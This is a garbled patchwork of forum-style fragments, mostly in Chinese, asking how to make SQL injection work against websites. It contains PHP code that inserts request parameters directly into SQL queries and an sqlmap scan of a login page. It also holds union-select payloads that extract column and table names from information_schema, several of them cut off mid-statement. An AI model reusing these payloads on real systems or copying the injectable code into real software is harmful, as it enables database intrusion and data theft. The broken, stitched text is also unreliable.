` WHERE `webnr` LIKE '%$webnr-%' AND `hoofdgroep` = '$_GET[id]' ORDER BY `naamt1` ASC";while ($groeprij = mysql_fetch_array($groepres)){
?` WHERE `webnr` LIKE '%$webnr-%' AND `hoofdgroep` = '$_GET[id]' O
我尝试使用Hack Bar在网站上执行SQL注入。服务器没有响应SQL错误。sqlmap -u http://website/login.php?op=login --dbs[10:06:33] [CRITICAL] all tested parameters appear to be not injectable.
所以我的问题是:即使web服务器没有显示任何错误,也可以得到SQL注入吗?
我有一个小应用程序,有一个字段我可以写一个数字并提交它,页面请求转到服务器,我得到一个响应或没有响应(根据参数)。
这就是结果,现在我可以验证这些字段实际上是可注入的,我试图在字段中复制有效负载并提交它,但是它没有工作。$q = " select * from users where id = $_REQUEST['cnic']";
我有个问题我希望有人能帮上忙。我遇到的问题:www.vulnerable site.net/articles.php?id =-1 union select 1,2,group_concat(column_name),4 from information_schema.columns --www.vulnarable site.net/articles.php?id =-1 union select 1,2,tabl